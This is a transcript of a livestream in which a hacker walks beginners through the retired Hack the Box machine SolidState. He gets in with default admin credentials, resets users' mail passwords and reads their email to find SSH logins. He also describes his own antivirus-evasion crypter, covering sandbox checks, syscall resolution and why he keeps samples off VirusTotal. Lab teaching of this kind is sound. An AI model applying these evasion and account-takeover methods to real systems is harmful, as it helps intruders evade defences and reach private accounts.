right. Getting ready. I got my water. It doesn't have mold in it. It's a good start to a stream. Okay, it's a good start. Tiberius, congratulations on your promotion. Well deserved, sir. Well done. Thank you so much for being here, as always. And congratulations again on your promotion. Are you fuckers ready to do some goddamn Hack the Box? Are we, like, it's going to be a toss-up if we actually find a Hack the Box machine that's acceptable for beginners, but we're going to make it work. Zarios, from 0 to 10, how much do you not remember me? I remember you, Zarios. And BTTV is enabled. That's how you can see KEKWs in chat. You only get to enable a certain number of BTTV notes, or emotes at a time. And that one isn't enabled. Maybe we'll just get started a little bit early today. All right. All right, we got our water. The light is on. Star is in the doorway. Mic is on. Recording is on. Melania is dead. And yeah, we're ready. Alrighty, welcome, my friends. Oh, my camera's all cattywampus, though. Let's fix the cattywampus camera. There that is. Chad B. New bringing Anpu the God into Anpu the God. Anpu the God into the fold. Welcome, Anpu the God. Did you get my Twitter stuff? I haven't. I did check my Twitter DMs earlier today. I may not have responded to yours yet. I'm not always the best at responding to my. Oh, I did get it. Yes, thank you. Thank you very much. I appreciate it. Alrighty. Alrighty. Christy, thank you so much for the raid right at the beginning, bringing us your viewers. Thank you so much. We're just getting started. We're going to be hacking some Hack the Box today, despite the fact that my position is consistently that there are better platforms for beginners. That doesn't mean that there isn't stuff for you to learn on Hack the Box. And Hack the Box has made improvements to their platform to make it more approachable for beginners. How was Foot Fetish Con? It was FootCon or WinterCon? It was FootCon or WinterCon. It was great. We had a great time. I'm sad that it's over. Now it's back to the grind again. Yep, that's about all I can say about it. It was great. It was a good time. I had a good time with it. Is Hack the Box much harder than Try Hack Me, or is it more realistic? It's definitely less realistic on average. I would say most Hack the Box machines have like a theme. And they tend to be more contrived, if that makes sense. Like the exploitation methods. I'm not saying you can't learn things from Hack the Box, but there just tend to be like a theme to every box. Like Bucket, for instance, was all about AWS. Literally the whole thing was AWS. And does that make it less realistic? No. Because AWS is obviously a very prevalent platform out there, and you need to know how to pen test it. But like they tend to be very esoteric themes. Like you'll have a You'll have a box about the Elk Stack. You'll have a box about Amazon AWS. You'll have a box about like IPSec made that one time, JARMS. I wouldn't say it's less realistic. It's just Hack the Box machines tend to be more specialized and focused on one specific little topic. Try Hack Me machines and Proving Grounds machines just cover all kinds of shit. KFB33, thank you for the first time indoctrination into the cult. Welcome to the All Has Red team, my friend. Thank you so much for supporting the stream. Look, looks like they have a couple of retired easy boxes. Yeah, we'll look. We can't do any active content. Hack the Box's terms of service prevent us from doing any active content, as regular viewers of this stream will note. So we'll be doing some retired box, but we'll sort by the user ratings and try to make an educated guess as to a box that is reasonable for beginners. So hopefully we'll find a good one here. KFB Gaming Golfer with the 8 months. Welcome back to the All Has Red team. Thank you so much for that 8 months of Prime. I do want to report to the stream a couple of things. Number one, I have defeated Melania, Blade of Mikola, in Elden Ring. The witch is dead. She has been brought low. After a very brief 3 or 4 hours of trying. God damn, that fucking boss was a fucking bitch. I would say she's the Orphan of Cause of Elden Ring, but no, let's be honest. Melania is harder than Orphan of Cause. There are no attacks from Orphan of Cause that I was legitimately just like, what the fuck do you even do? After it killed me a couple of times. Like, there's one attack from Melania that, what the fuck? Like, legitimately, I was tilted out of my mind over that attack. It seemed like, okay, I just gotta burst her down and hope she doesn't do it, because I have no idea how to get away from it. And I still basically don't know. I had to go put a different Ash of War on my weapon in order to consistently get away from it. And then I started, it's still very precise, but I started being able to at least not die to the auto kill attack. And then I actually did defeat her. I actually did defeat her once, but she got one attack off moments before I killed her that inflicted the Scarlet Rot on me. So she died, and it apparently takes her like fucking 30 seconds to die? Like, seriously, she has the longest death animation of all time. And I died of the Scarlet Rot before she died, so I didn't get credit. I didn't get credit for killing her. Don't KEKW me. It wasn't funny. It wasn't funny. I was pissed. I was very mad. I was very angry about that. But then I did kill her legitimately sometime after that. Is there anywhere to watch all the previous streams? I still have to upload them to YouTube. I'm trying to get them up onto YouTube. I'll upload some more tonight. If only we got that on stream. Oh, God. I don't want to stream my frustration with that kind of crap. I guess I could have streamed Melania. Melania was fine. I'm bitching about her now. But honestly, other than that one attack, she was quite fair. Yeah, she's going to fuck your ass up if you don't answer her movements properly, as a FromSoft boss will. There was just that one attack that I'm just like, what the fuck, dude? But other than that, I actually thought it was my favorite fight of the game, honestly. Once I had that attack, like, kind of halfway dealt with, it was my favorite fight of the game, honestly. With the music, the atmosphere, the scene, it was good. It was a good fight. It was a good fight. People are, and the reason I'm bringing it up is people call that boss the hardest boss in the entire FromSoft franchise, which I can believe. Definitely harder than any other boss that I've fought in the FromSoft franchise. FromSoft, harder than Orphan of Cause and harder than Ishin Sword Saint for sure, which I think were the other candidates. Yeah, so there's that. I want to say that. Also, second thing, I did last week, or 2 weeks ago, actually. Feels like last week because I was at FootCon all last week. I did do an impromptu show-off of my my new custom Packer crypter tool written in Nim that I'm using to obfuscate my payloads for red team engagements. And people are and I have released it on my Patreon to Patreon subscribers. And I know you're all like, "Oh my goodness, he's put it behind a paywall." First of all, my Patreon costs as little as possible. Literally as little as possible. I just bought whatever. I set the tiers at the tier at the lowest possible level. First of all. Second of all, with AV evasion stuff, it's always questionable of if you want to release it publicly because you want it to last a long time. I want it to be a while before AV and EDR catches on to this tool, which I'm calling Reanimator. So I want to release it, but I don't want to ruin its viability because everyone starts to use it. So again, it is on my Patreon. Please don't upload samples to VirusTotal.
Thanks for sharing your tool.
So
Excited to check it out. Smile.
I would not say it's an end-all be-all for AV evasion. It's gotten past all the stuff I've thrown at it so far, but again, I haven't uploaded it to VirusTotal to see how it fares because I want it to continue to work. But it has worked in the real world against everything I've thrown it against. ATP was a little bit squirrely. I've made some new updates over the past several days that might get it past ATP. But I'd have to look. I'd have to check. I'd have to test it out. It was getting past ATP with the DLL payload, but not the executable. The executable was not making it, but the DLL was. The DLL does get past. The DLL output does get past ATP. Is VirusTotal very accurate for most stuff? Oh yeah, VirusTotal will test your payload against like 90 different AV solutions, like a super high amount of AV solutions. The problem is that VirusTotal is free, and the old adage is if you're not paying for a service, you are not the customer, you're the product. And in fact, with VirusTotal, what's happening is VirusTotal makes money by selling the telemetry data of the samples by submitting data on the samples that get submitted to it to the AV vendors so that they can update their stuff. What about alts to VirusTotal like antiscan.me? Antiscan.me claims that it does not submit your data. However, most AV products have built-in telemetry on their own, and I don't know if antiscan.me is running these payloads in an isolated environment. And plus, you can't really trust it. I don't trust it fully, so I also don't use antiscan.me with stuff I want, just to be safe. But VirusTotal is definitely bad for like custom AV evasion tools. So please don't upload it to that. Please don't. It has worked against everything that I've tested it against so far, but that's just because it's a new tool. Owen Codes with the 10 bits. Thank you so much for those 10 Tiggle biddies. Miney with the 7-month re-indoctrination. Welcome back to the All Has Red team. I hope that you enjoy the tool, and I hope that it helps you out. What's the GitHub repo? It's in a private repo. If you want access to the tool, it's on my Patreon. I have it in a zip file posted on my Patreon. So take a look at that if you want to see the tool. You will need NIM installed, but I've included instructions on how to install NIM and compile the tool and get it working in the README for it. So you shouldn't. Unless you decide to do obfuscate, I've made a whole bunch of updates to it over the last several days, including string encryption, which it turned out there was a really convenient library for that, like just in NIM. NIM just has a really convenient library for that does it all in an automated sense. So I did not have to reinvent the wheel with that one, so I just threw that in. It also now dynamically locates syscalls, or it dynamically resolves the locations of various system calls in memory, rather than self-defining them, if that makes sense. So it's a little bit stronger in that respect. It also can optionally tell if the host it's running on is domain joined and selectively execute based on that fact, which is useful for sandbox evasion. It's useful for sandbox evasion, and it's useful for making sure that your payload doesn't get away from you and escalate on somebody's host machine or home machine or anything like that. It's only meant to run on domain joined machines. Because again, this is a red teaming tool, so I have a number of options built into it specifically to facilitate a red team engagement. Is a laptop better for hacking or PC? They're both fine, dude. PCs are going to be cheaper for the amount of muscle you're going to get behind them, but laptops are mobile. So if you have a need, I would say get a PC unless you have a significant need to be mobile. Unless you're traveling a lot, a PC is going to be better for you. All right, why don't we hop on over into Hack the Box? Why don't we just get started? Because I'm probably going to need some time to get past CrowdStrike Falcon, which will probably be running on this on whatever machine we end up doing. So let's take a look-see. Okay. Retired machines. Now, what are the most recent ones? See, we do get ransom. Did we do ransom? Oh, no, this is an IPSec box. Probably not good for Newbie Tuesday, I'm guessing. If it's an IPSec box, it's probably not great. What about Steam Cloud? Some were mentioning this in chat. What is this about? Does it give me any indication of what it's about? It's giving a lot of easies. A lot of easies. We could possibly do with this one. Secret, perhaps? Return seems reasonable. I like the easies I'm seeing there. It's Kubernetes focus? Okay, not Kubernetes then. Kubernetes, oh my god. We're going to lose people with Kubernetes. Not a good day for Newbie Tuesday. See, this is... Well, the antique and return both seem reasonable. Okay? Let's do a poll. We're going to do a poll. I'm going to lose people if I start talking about Kubernetes. Like, I lost a lot of people when I started talking about Docker. And Kubernetes is like Docker squared. Okay, antique, return. We're going to pick some... We're picking ones that edge on the easy side. Because, again... Apparently I've done knife. But there's a lot of easies. But I don't remember it. So we'll throw that in there. I must have done it during my push for Guru. But I don't remember anything about it, so it's probably fine. There's buff. We'll throw that one in for a Windows machine. We'll try to get a couple of Windows machines in here because you guys do love the Windows machines, don't you? This Servmon. Or, let's see, Servmon. We'll do Servmon. That's fine. Okay. 2 minutes. Get your votes in. Oh, SolidState for OSCP prep? That is there. We could do SolidState as well. Like, can we cancel this poll? Shit. If you want SolidState, say it in chat. It is on the OSCP prep guide, so I would throw that in. If you wanted to see SolidState. It looks like we're getting... I mean, return right now is winning. I can't cancel the poll, unfortunately. Okay, well, if enough people say SolidState, I'll take them as votes for SolidState, okay? If enough people are saying SolidState, it looks like... Right now we have 7 votes for return. And it looks like about 7 votes for SolidState as well. Okay, 8, 9. So now we have 9 votes for SolidState by my count. Okay, 10 votes for SolidState. Some people are probably typing SolidState in chat and then picking return as well in the poll. So it's going to be a tie, as is tradition. As is tradition. Well, we'll do a second poll between return and solid state. Tell you what, we'll do that. We'll do that. We'll do a second poll between return and specifically between return and solid state. All right, just a 1-minute poll to break tie. All right, there's your votes. You got 1 minute. Get your votes in. It's going to be a tie, but we're going through the dog and pony show regardless. Oh, maybe it won't be a tie. Getting a lot of votes for solid state right now. Oh, is return going to catch up? Probably not. Dog and pony show? You've never heard that expression? You never heard that expression? Okay. Watch solid state be a hard box. It looks like, I mean, user ratings are fairly easy. See, the user ratings seem reasonable. I'm not sure what it's rated officially. It's probably rated medium, I would guess. Oh. Oh my god, it's not a tie. Solid state by a nose. Solid state by a nose. Okay, we're doing solid state then. Let me just pull this over here, and I'll start it up on the mod server. Okay. Solid state. I mean, there's nothing that's glaringly weird about its ratings. I think we should be okay. Start up the VM. I apparently forgot to start my VM before we started today. Let's go to this. Let's change the box name. Solid state. Alrighty. By today's standards, I'd call it easy. Sounds fun. That sounds good. As long as I can break it down for beginners, it's fine. Again, today, specifically Newbie Tuesday, we're trying to... I just want to be able to break down whatever it is we're talking about for beginners. If we do a Kubernetes box, how am I breaking down Kubernetes for beginners? So no hacking happening just yet. All I'm doing is connecting to the HacktheBox VPN. There are instructions for how to do this on HacktheBox's website. Easy enough to find. We get a lot of output here, but most of it doesn't matter. We're just looking for this initialization sequence completed at the end. Is Kubernetes like a virtual machine? So Kubernetes is...
At Al4ZR3D, when you first started out on a proper red team job, what was AV evasion like compared to how it is today?
It's the same. It's the same. It's basically the same as it is now. I'd say Windows Defender is more prevalent now than it was. Windows Defender used to be a joke, and it's no longer a joke, and it was when I started. Kubernetes is like... so if you have a lot of... Like, we've gone through Docker and how to control container and how to spin up containers. But what if you... But, like, a lot of times your services are like many containers that all work together in concert. Kubernetes is a tool for managing whole... like bunches of containers. in groups called pods. And it automatically handles things like load balancing between the containers. It's very confusing for beginners. That's not a good box for beginners. Even if it's easy, for people who understand Kubernetes, it's not going to make any sense. It's not going to make any sense to beginners. So, CD HacktheBox, Mcdir, SolidState, RMTech RF SolidState, Mcdir SolidState. Okay, we're just making a working directory we can work inside here. SolidState. And here we are. Okay. Let's make sure we can ping it. 10.10.10.51. And we can ping it. So we have connectivity with the machine. So, saw a meme of the aliens guy from History Channel captioned containers. Yeah, it's basically what it is. If you like, it's very highly in demand because it's a cloud technology. It's listed on my profile because I worked, and my LinkedIn profile because I worked with it when I was a dev. But a lot of people, and a lot of recruiters to this day reach out to me asking for Kubernetes experience. So it's a highly valued tool to be able to use. You guys see her back there? Yeah, she walked in behind us. Yeah, she's back there. Hi, honey. Come here. Yes, I know. Yes, I know. Oh, my baby. Oh, my little one. Oh, yes, my little one. Come see the stream. You come see. Come see the stream. Oh, yeah, here she is. Here's this lady. This bad. I know, honey. Oh, yeah. It's a good lady. Come on. Go ahead. There you go. Oreo Bite, thanks for the 100 Tiggle biddies. I hope I answered your question well. But AV evasion has always been the same basic thing, you know. It's like the techniques have evolved a little bit, but ultimately most AV is still signature based. And heuristic stuff is still not good enough. Is still not good enough to detect. Like I mean, it is getting more sophisticated over time, but the attacks are getting more sophisticated as well. All right, so let's start with how are we always starting? Well, first of all, I forgot to point out, if we ping the box, we can see based on the time to live field in this ping reply that it's probably a Linux machine. But we can tell that because Linux and Windows set the time to live at different values. Linux will set it at 64. It then gets decremented to 63 when it crosses a router inside the HacktheBox lab. A Windows time to live would be probably 127. We start with auto recon. We're not gonna start with auto recon today. But I do recommend that everybody check out auto recon. Auto recon on Tibbs's GitHub. It's a very useful tool, especially if you're going through OSCP. So let's start with ye old nmap scan 10.10.10.51. We'll just do a basic nmap scan to start. Nmap, you're typically going to do more than one nmap scan when you're making manual recon. I keep thinking about doing manual recon just as a joke. Oreo Bite, like, you've put together your own manual recon. You showed it to me. Like, he's got his own, like, manual recon. But, like, all it would be is basically a cheat sheet. It'd be fun. It'd be interesting to write. It might be a fun little project to do in my spare time. I've just been doing other development projects in my spare time right now. So I've had my mind on other things is all. So this is interesting. We do see the dynamic duo, port 22 of SSH and port 80, which is HTTP open. But we also see some other interesting ports. We see SMTP, we see POP3, which is kind of an older email protocol. And we have NNTP on 119. I'm not familiar with that, but again, most of the time you're going to end up running more than one Nmap scan. So let's just let's do another Nmap scan. Let's do TAC-SC for default scripts, TAC-SV for enumerate versions. Let's specify the ports that we see open here. 22, 25. So it doesn't like scan all the ports that we've already scanned. We want to be efficient when we can. 10, 10, 10, 51. And let's see, we're going to do version detection. It's going to try and detect the versions of the software that are running on each of these ports. And default scripts is going to run some basic Nmap enumeration scripts, such as if FTP was open, it would tell if anonymous FTP login was enabled. It'll display the host keys for SSH. And it'll check robots.txt for you on HTTP servers and that sort of thing. Al channeling is inner IPsec. I mean, my inner IPsec is basically just IPsec. Most of the stuff I learned a lot from him. I learned a lot from him while I was starting out. So, yeah, unironically, yes. This is an inherently collaborative. The earlier that you give up on this idea that you have to do everything yourself in this field, the earlier you're going to be you're going to be successful. This is a
hunter must hunt.
This is a consummately collaborative enterprise, especially on the offensive and defensive side. Intensely collaborative. You work together, and by working together, you all become better. So yeah. SV for enumerate versions, SC for default scripts. Well, yeah. I used those options originally because he taught me to use them. I'm not going to lie about that. I didn't organically come up with that. I watched IPsec religiously when he was first starting his... I was one of his first viewers on YouTube. I found him way back when HacktheBox still had a registration challenge. HacktheBox, you used to not even be able to just register for HacktheBox. You had to like do a little hack challenge, which was pretty easy. You had to do like a little hack challenge to get access to it. We do see something called James SMTPD. We also see we see SSH. Here's the host key. We see this is kind of an older version of SSH, but that I would expect that because this is an older HacktheBox machine. And we see James POP3 as well. So this is clearly some kind of email server, and we can, whenever you see like software versions like this, especially ones that stick out to you because they look old and you don't recognize them, it's always good to head on over here to SearchSploit right off the bat. We'll do James. And wouldn't you know it, remote command execution, what was it, 2.3.2? Is that the exact version? Yeah. My goodness, I'm already. Oh, NNTP. You don't see that very often these days. It looks like all of our scripts failed, by the way. It's probably because it's just old. It's probably just old services. So we do have a number of things here. We do see authenticated RCE, and we see a remote command execution. Let's take a look at this one. X for examine. So, okay. James remote administration tool. Default is root. Okay, so it does require credentials, but there are default credentials. Okay, so let's see if we can connect to it. Just right off the bat, let's see if we can connect to this service on port 110 with Netcat. Not NLVP. 10, 10, 10, 51. 110. What are you doing back there? You little goofball. Test. SolidState POP3 server ready. Root. Okay, I gotta remember how to communicate with POP3. So we can, let's head back over, let's go to Hacktricks. Hacktricks, I think, has a POP3. Pen testing POP3. Okay, we did that. Okay, we have some commands. Okay, so this is basic how to log in. So let's see if we can get logged in. Let's use telnet. 10, 10, 10, 51 on 110. Connected. User. Root. Okay, it took a while to respond. User root. Okay. Error. User root. Error. So it looks like the credentials have been changed, I guess, unless I mess this up somehow. Die. I hate Telnet. I just want you to know that I bought a tablet just to see your stream better. Well, I hope there were other reasons other than that. That's a little bit... I mean, I'm flattered, but you didn't really need to do that. She's being adorable. It's a natural behavior. She is. I don't know where she went. She ran away again. She's got... It's the witching hour, apparently. If you want to use Metcat, there are 2 flags. Oh, I didn't know that there was a TAC-T flag for behaving like Telnet. Well, there's other things to enumerate here, and we want to make sure that we don't tunnel ourselves on just one port. This is a common mistake that people tend to make when they're new to this kind of stuff. They see one interesting port and they just tunnel on it for way too long. So let's make sure we run our other enumeration and we enumerate the other ports. So we did see that port 80 is open, 10, 10, 10, 51. We're running an all port scan. That's what this TAC-P TAC is meant to denote. It's going to scan all 65,535 TCP ports in case there were any that we missed. Okay, we see SolidState Security, award-winning security team. SolidState's testers hold the highest technical qualifications. That's great. So that when my my chat full of hooting apes gets root on this box, that'll look great on their resumes. RCE does look juicy. It does look juicy, but it only works if we have credentials. So it looks like the credentials don't work. So I'm just going to make sure that before we tunnel too hard on the RCE, that we're not missing anything. Honestly, that was the main reason. Well, that's super nice of you, Pharma RL. I hope it's working for you. I make that mistake sometimes. I see a web server and forget about everything else. Yeah, everyone makes that joke. That's why I'm bringing it up to you now, Russ Rodriguez. And that's why tools like Auto Recon are useful, because Auto Recon doesn't forget stuff. There is value, and that's why I do this all manually on my stream. There is value in doing this stuff manually so you can understand what you're doing. And you can understand what you're doing and what effect you're having on the target. But Auto Recon does help because it will do all this enumeration for you. Social engineering, red teaming, excellent vulnerability. Okay, let's view the page source. Is this like a WordPress blog? What is this? It doesn't look like any particular CMS. It just looks like a It just looks like maybe React. Just a basic page. Okay, let's go to GoBuster. This is all the basic enumeration that you should do all the time when these ports are open. 51. We'll use word list user. Share word lists. Dirbuster. Directory list 2.3. Medium.txt. I guess we won't do it. We'll do like 50 threads. And we won't do any file extensions just yet unless we get a good idea of... Now, we don't think there is a robots.txt because Nmap should look for that for us with the TAC-SC flag, and we indeed do not see a robots.txt. So we're just seeing images and assets. We knew about that from the page source. Oh, there's this menu here. Services. About us. Founded in 2005, and it is an awards-winning provider of cybersecurity, compliance, infrastructure, and incident response services to organizations in the United States, Canada, Asia, Pacific, and further afield. Weird grammar, but okay. SolidState Security also delivers services across the U.S., U.K., Europe, Africa, and the Middle East, just all the places in the world, from its EMEA headquarters in Baltimore, Maryland. I'm sorry to hear that. SolidState Security provides true global coverage, allowing it to respond to the... Okay, it doesn't matter. What else do we have here? Now, we do want to take note of things like this. Like email addresses and things of that nature. Let's get some notes going. We're good hackers. We take good notes. Periops with the 4-month prime. Thank you so much. Welcome back to the All Has Red team. Jay Imster, thank you for the follows. All right, we're opening up our notes. Where is Hack the Box? Here it is. Let's paste that in. So we got a note set up. This is Obsidian. This note-taking software is Obsidian, if you don't know. So we're just putting down things like email addresses and things like that. I shared a dope tip with Al that helps bypass the Privesk. I think we may have done this one on stream already. I don't remember exactly. I don't remember anything about it so far. I do so many of these damn boxes, I can't remember any of them specifically anymore. But some of you have said in chat that you've seen this one before. We do see an address in Baltimore, Maryland. We can try putting in test, send message. test@test.com. So it is doing some validation. Okay, it just sends us back to the main page, it looks like, or to about.html. Let's take a look at this FBI, open up! I don't even listen to the FBI anymore, dude. I don't even, at this point, Parsons is up my ass 24 hours a day. I'm not even listening to the FBI. So we see the form. Where's it being submitted to? Nowhere. It's being submitted to the hashtag, which is basically just the root page. That's why. So it's not actually getting submitted is the point I'm trying to make. There's no actual logic that's submitting anything. So it's not, there's nothing to test there. There's no attack surface. We don't have any images or assets. Did we discover anything new with the Nmap scan? 110, 25, and 22. So we want to enumerate those services a bit further, I would say. We did 25 and 22. We did pop 3. We could try and guess some pages? Or try to guess some usernames? So we would be... So subdomains or vhosts? Yeah, we could do subdomains for sure. I don't see any indication here of what a subdomain would be. Like, would it be solidstatesecurity.hackthebox? Would it just be solidstate.hackthebox? There's no indication of... Oh, there is a domain here. But this is a .com, which is a little unusual, but we do have a domain. You're absolutely right about that. Vim Etsy hosts. Oh. Okay. 10:51. SolidState.com. We'll also put SolidState there. Okay. Okay. All right, so if you don't know what the Etsy hosts file is, it's basically allows you to skip DNS enumeration. Like if you normally try to like ping a domain like solidstate.com that your box doesn't know, it's going to do a DNS query. We don't want it to do that because there's no DNS server to resolve solidstate.com that it's going to know what solidstate.com is. It's going to probably try to go to a solidstate.com on the open internet, and we don't want that. So we use the hosts file. The machine will check the hosts file for host names like this, for an entry with for a host name like this before it tries to do a DNS query. So there you go. Oh, it's solidstatesecurity.com. You're right. My bad. Vim Etsy hosts. We can just add another entry. Solidstatesecurity.com. So we can try to browse to solidstatesecurity.com. Oh my God, I can't type. Okay. We get the same page, so probably no virtual host routing happening. Oh, they have some excellent pictures here. Jesus. I know that I, like, literally only do my hacking in front of a projector of ones and zeros. This is the only... Like, you don't have a... If you don't... Listen, real talk right now, okay? If you don't have a projector of ones and zeros on, like, directly into your eyes at all times while you're hacking in your hoodie... of course, your hoodie. Are you really a hacker? And I would say no. My argument would be no. And of course, we do have the classic, this is the best way to socially engineer somebody. It's actually basically an automatic win. If you just show up to a bank wearing a Guy Fawkes mask, and just say hello, they'll be like, right this way to the bank vault, sir. That's basically all it takes for social engineering. It's very, very easy. That's a trick of the trade, okay? Trick of the trade. I don't even have one of those masks. I have one. It's behind me, actually. Is it? Where is it? Oh, it's back. It's on the top of my thing back there. It's in a box. But I do have one because I used to like that movie before the internet ruined it. This is all the same stuff. So this all looks like just static content. It doesn't look like anything here. They do have actual content here. Like, this isn't lorem ipsum. So my guess is that we may want to run cool if we have to brute force for a password. This is always a good thing to do, by the way, whenever you're testing a website. Just sort of click around on the website. While you're running GoBuster or whatever, make sure you got manual stuff or automatic stuff running in the background. But while you're doing that, while that automatic stuff is running, like, just click around the website and see what it's doing. See what's going on. Okay, so there's nothing there. Let's do let's look again at that RCE then. Because we haven't seemed to find anything just yet. James 2.3.2. Insecure user creation. Oh, we do have a Metasploit module here. I didn't even see this one. Insecure user creation, arbitrary file write. My guess is we're going to need credentials, though. That does sound like something you'd need credentials for. But we'll take a look at the module anyways. So this is a Metasploit module. It is written in Ruby. But we're going to see what the info is. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory. To use this module with the cron exploitation method, run the exploit using the given payload, host, and port. After running the exploit, the payload will be executed within 60 seconds. Due to differences in how cron may run in certain Linux operating systems such as Windows, it may be pressable to set the target to bash completion, as the cron method may not work. If the target is set to bash listener, for this execution method, bash completion must be enabled to gain code execution. This exploitation method will leave an Apache James mail object artifact. I always like it when these modules include like a OPSEC considerations. If I was gonna, I greatly appreciate that if I was gonna use this module in like a real assessment. But that's Apache? What do you mean? So there's two methods. You can either write to the cron file, but I'm assuming this would only work if the server was running as root. And that's because it says root here. And because only root can make stuff run with cron. James remote administration tool. See, we haven't seen anything about a remote administration tool. We see that POP3 is running with this 4555 port. Did we see that in Nmap? I feel like I would have seen that. 80, 110, 25, 22, 119. No, we haven't seen 4445. Let's see if that's up on the target. 4445, 10, 10, 10, 51. And it says closed. Oh, it's 4555. Excuse me. My goodness. There we go. So we're gonna what apparently takes it's taking a second. It's running. I'm guessing that the port is open and it's just running scripts against it. It does seem to be up. It would have already said it was down if it wasn't up. We're only scanning a single port. So going back to this Metasploit module while this is running. So if you don't know what bash completion D is, bash completion D is a place where you put user-defined completion scripts. Bash completion is that tab autocomplete that you use. It helps you type commands. It helps you type commands easily, and you can actually write scripts into bash completion D, which is a directory, and it will basically you can define how the completion works for you. It is a way that you can achieve code execution through. It is a way that you can achieve code execution through a file write, if you can write as a certain user. Cologne Panther with the 5 months. Let's go indeed. Welcome back to the All Has Red team. Cody, thank you for the night. Thank you for the follow. Maybe it doesn't like being scanned. It's probably just old. Nmap is probably trying to figure out. Jesus, is trying to probably trying to figure out. Is just trying to figure out what port is running here, or what service this is. Any reason you do a connect scan instead of a syn scan? I mean, I could just run this as root and it would do a syn scan. There's no, in real life, I would use a connect scan instead of a syn scan because syn scans are much more conspicuous on network monitoring software. In the old days where, you know, network monitoring wasn't all that robust yet, syn scans were fine because they helped you be a little bit more low and slow by sending less packets over the network. But that is no longer the case. These days, you're not trying to send less packets. You're trying to blend in with already existing packets. So lots of network monitoring software will flag a syn scan because you're never actually completing the TCP handshake. The connect scan is just a normal TCP handshake. It blends in. It blends in better. Slayer X1, thank you so much for your resubscription, re-indoctrination into the cult. Welcome back to the All Has Red team. Thank you so much. Did the full Nmap scan finish? Well, let's see. It did. And it did find 4555 open. But we were able to extrapolate its existence from the James thing with proper enumeration, which is good. So we do see James remote administration tools. This must be what these exploits are actually exploiting. Okay. So we can... At this point, we can try and connect to this this service. So telnet 10.10.10 51 port 4555. I don't like telnet very much. Test.
A hunter must hunt.
Why? Stop. I'm not a fan of telnet. Let's try an NCAT. 4555. Zero Kieran bringing Ryskill and Great and Mr. Upload into the cult. Welcome, my friends. Zero Kieran, thank you so much. Let's get Stream Raiders going, by the way. No one reminded me about Stream Raiders. Okay, so Netcat works a little bit better.
A hunter must hunt.
Noted. THX for sharing your knowledge.
It says the
Best
escape sequence and Al always misses it.
1337
Dude, I never use
heart.
Telnet. Are you kidding me? Who the fuck is using Telnet these days? Let's try root and the password of root. And we do get in. Okay, cool. So those credentials did work. We were just using them in the wrong place. Okay. And the reason we guessed is, like, other than this being obviously the strongest of all possible passwords, we saw that these were default credentials in the searchsploit exploit. Searchsploit marked root as the default credentials. Keep playing. So that's why we didn't just sort of guess those out of a vacuum, although those would be credentials to guess if you were going to guess. Pharma RL with the 6 months. I'm so glad. You super subscribed with that with that tablet apparently that you bought. Thanks for sharing your knowledge. Hey, thank you so much for being here, Pharma RL. Super happy to have you. So we do see. Let's do list users. Okay, we have 5 users: James, Thomas, John, Mindy, and male admin. Okay. Now, we did see that Metasploit module had a directory traversal in the username, so you could write an arbitrary file. Apparently, it writes a file to the system whenever containing user information. Now, can I see... we can also check we can check these users' emails as well. Which I think would probably be prudent of us. So we can just set all these users' passwords. I'm not concerned about Set password James. James. Set password Thomas. Thomas. Everyone's getting a strong password today. Set password John. John. Set password. Now, on a real assessment, you wouldn't want to do something like this. You don't want to be locking users out of their accounts if you can avoid it. But since this is not a real set password mail admin. Okay. So we can now try and log in. Let's take these usernames. Let's put these into our notes. I know it has to be pet names. That is mandatory. Pet names, and also the year you were born is good. Your son's birthday, also good. No one's gonna guess that. Oh, who am I kidding? In order to have a son, you would have to like have sex with somebody, and nobody in chat is having sex with anybody. So, all right. So let's connect to POP 3. 110. We'll do it in Telnet. Ouchies. Oh, listen. I know my chat is maidenless. Okay. User James. Pass James. Okay. Now this is where hack tricks comes in handy. This is where hack tricks is POP 3 is going to come in handy. We can now log in and we can read their emails. POP 3 is kind of an older protocol. In these days, most email will use IMAP. Okay, we can list. Okay, so list. So it looks like James has no emails. I guess this first number is the number of messages there are, and the second number is the total storage, because it looks like these add up to 1807. All right, so nothing there. Let's just okay, we'll use the escape sequence this time, because that's intuitive. What the hell? I'm doing the escape sequence, chat. Chat, help me. I'm doing the escape sequence. Oh, is it like... No? Oh, control. Okay. Quit. There we go. We figured it out. We mastered Telnet. Good work, team. Okay, user. What were the other users? Thomas. Pass Thomas. List. No messages. Quit. Do it again. User John. Pass John. Okay, list. Oh, we do get a message here. So we can retrieve one. Okay, so now we can read John's email here. Can you please restrict Mindy's John, can you... This is from Mail Admin, which is a different account we haven't gotten to yet. Can you please restrict Mindy's access until she gets read onto the program? Also, make sure that you send her a temporary password to log into her accounts. So we can expect that if we look at Mindy's, she's gonna have a temp password in there. I would expect, which is always great. So let's check out Mindy's Mindy next. User Mindy. Pass Mindy. And we can go list. And we do have 2 messages here. Retrieve 1. All right. From Mail Admin. Dear Mindy, welcome to SolidState Security Cyber Team. We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our organization. The enclosed information is designed to serve as an introduction to cybersecurity. Introduction to cybersecurity. I mean, I guess if you're a junior, I guess they have a... Man, the idea of what comprises a junior analyst has really evolved. These days, in these days, these fuckers are sending this chick an email like, here's what cybersecurity is. And in the modern day, it's like, you need at least 3 SANS certs, and you need at least 3 SANS certs, and you also need to have hacked at least one major organization in your time to be a junior defense analyst. Provide resources that will make a smooth transition in your role. The cyber team here is here to support your transition, so please know that you can count on all of us to assist you. We are looking forward to you joining our team and your success at SolidState Security. Okay, this is boring. There's no passwords in here. I'm bored. So we'll retrieve 2. Bam! Here are your SSH credentials. I do love... Chat, don't we love SSH credentials? Don't you love SSH credentials, chat?
A fine addition to my collection.
Those will make certainly very fine additions to our collection. Very fine additions indeed. You remember to reset your password after your first login, so we're going to hope that she hasn't logged in yet. Your access is restricted at the moment. Feel free to ask your supervisor to add any commands you need to your path. Okay, so let's do... so it's control there. Quit. Okay. And we can continue checking. Mail admin seems good. User mail admin. Pass mail admin. Okay. List. Okay, he has no messages. That sucks. But we've already got pay dirt, so we're probably fine. We'll quit out of Telnet. Alright, so let's SSH Mindy at 10:10:10:51. Password is... Okay, Mindy at SolidState. And she even gets a purple name. How nice of them. How very feminine. How very gendered of them. Alright, let's see what we have. Cat user.text. And we do have our user.text here. Uh-oh.
They ask you how you are, you just have to say that you're fine when you're not really fine, but you just can't get into it because they would never understand.
